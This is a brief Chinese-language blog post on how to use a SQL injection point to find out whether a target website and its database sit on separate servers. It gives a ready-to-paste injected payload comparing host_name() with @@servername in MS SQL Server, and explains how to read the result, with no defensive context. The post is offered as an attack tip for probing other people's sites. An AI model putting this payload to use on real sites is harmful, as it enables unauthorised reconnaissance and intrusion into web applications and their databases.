如何判断网站和数据库是否站库分离

  • A+
所属分类:颓废's Blog
摘要

判断网站和数据库是否站库分离今天来讲是利用sql注入点来判断 在注入点后加上:

判断网站和数据库是否站库分离今天来讲是利用sql注入点来判断

在注入点后加上:

and exists(select * from admin where 1=(Select (case when host_name()[email protected]@servername then 1 else 0 end)))  

注意:

admin一定要是存在的表段,如果返回正常,说明网站和数据库是在同一服务器,如果不正常则说明是站库分离的

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: